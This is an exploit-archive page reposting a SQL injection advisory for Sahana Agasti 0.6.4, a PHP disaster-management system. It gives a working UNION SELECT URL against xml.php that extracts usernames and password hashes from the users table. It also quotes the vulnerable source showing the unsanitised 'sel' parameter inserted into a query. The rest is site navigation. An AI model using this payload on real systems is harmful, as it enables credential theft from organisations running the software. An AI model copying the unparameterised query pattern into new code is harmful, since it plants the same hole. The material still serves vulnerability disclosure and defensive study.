Sahana Agasti 0.6.4 SQL Injection

Sahana Agasti 0.6.4 SQL Injection: Posted Jan 3, 2011; Authored by dun; Sahana Agasti versions 0.6.4 and below suffer from a remote SQL injection vulnerability.; tags | exploit, remote, sql injection; SHA-256 | c43b0c9ca78cd8229308c5d4edb24c33144301e739d1ef9fd747857df7113230; Download | Favorite | View

Sahana Agasti 0.6.4 SQL Injection

:::::::-.   ...    ::::::.    :::.
  ;;,   `';, ;;     ;;;`;;;;,  `;;;
  `[[     [[[['     [[[  [[[[[. '[[
   $$,    $$$$      $$$  $$$ "Y$c$$
   888_,o8P'88    .d888  888    Y88
   MMMMP"`   "YmmMMMM""  MMM     YM
 
  [ Discovered by dun \ posdub[at]gmail.com ]
 
################################################################
#  [ Sahana Agasti <= 0.6.4 ]  SQL Injection Vulnerability     #
################################################################
#
# Script: "Agasti is the PHP based project of the Sahana Software Foundation.
#          Based a long-term preparedness for disaster management..."
#
# Script site: http://www.sahanafoundation.org/
# Download: https://launchpad.net/sahana-agasti/
#
# [SQL] Vuln:
# http://site.com/agasti/sahana-0.6.4/www/xml.php?act=add_loc&sel=1/**/UNION/**/SELECT/**/null,concat(CHAR(60,66,82,62),concat_ws(char(58),user_name,password)),null/**/FROM/**/users
#   
#   
# Bug: ./sahana-0.6.4/www/xml.php (lines: 17-21, 200-223)
#
# ...
# $act=$_GET{"act"};                                                          //
#
# if($act=='add_loc')                                                         // (1)
# {
#         _shn_get_level_location();                                          //
# ...
#
# function _shn_get_level_location(){
#         require_once('../3rd/adodb/adodb.inc.php');
#         require_once('../conf/sysconf.inc.php');
#         //Make the connection to $global['db']
#         $db = NewADOConnection($conf['db_engine']);
#        $db ->Connect($conf['db_host'].($conf['db_port']?':'.$conf['db_port']:''),$conf['db_user'],$conf['db_pass'],$conf['db_name']);
#
#
#         $level=$_GET{"sel"};                                                // (2)
#         if($level==1){
#                 echo "none,";
#         }
#         $q = "SELECT location.name,location.loc_uuid,parent_id FROM location WHERE location.opt_location_type={$level}";          // (3) SQL
#         $res_child=$db->Execute($q);
#         if($res_child->EOF)
#         return;
#         while(!$res_child->EOF){
#                 $res=$res.",".$res_child->fields[1];
#                 $res=$res.",".$res_child->fields[0];
#                $res_child->MoveNext();
#        }
#         echo $res;                                                          // (4)
# }
# ... 
#
#
###############################################
 
 
[ dun / 2011-01-01 ]

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 64 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

Sahana Agasti 0.6.4 SQL Injection

Sahana Agasti 0.6.4 SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Sahana Agasti 0.6.4 SQL Injection

Share This

Sahana Agasti 0.6.4 SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems